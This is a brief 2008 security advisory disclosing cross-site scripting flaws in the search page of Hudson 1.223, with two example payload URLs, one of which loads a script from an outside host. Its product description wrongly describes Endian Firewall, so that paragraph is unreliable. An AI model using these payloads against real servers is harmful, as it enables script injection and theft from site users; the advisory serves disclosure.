Hudson version 1.223 suffers from multiple cross-site scripting vulnerabilities.
#Security Advisory - Multiple Vulnerabilities in hudson#
Endian Firewall is a "turn-key" Linux security distribution that turns every system into a full-featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.
Date : July-11-2008
Product : hudson
Version : 1.223 - Prior versions may also be affected
Vendor : https://hudson.dev.java.net/
Author : syniack
Contact : syniack@gmail.com
XSS Vulnerability: [TESTED]
Security issue in the following file:
hudson/search/?q=xss
Example:
http://www.example.com/hudson/search/?q="><script src=http://www.example2.com/re.js></script>
http://www.example.com/hudson/search/?q="><script>alert(1);</script>
Image URL:
http://img81.imageshack.us/my.php?image=hudsongq2.jpg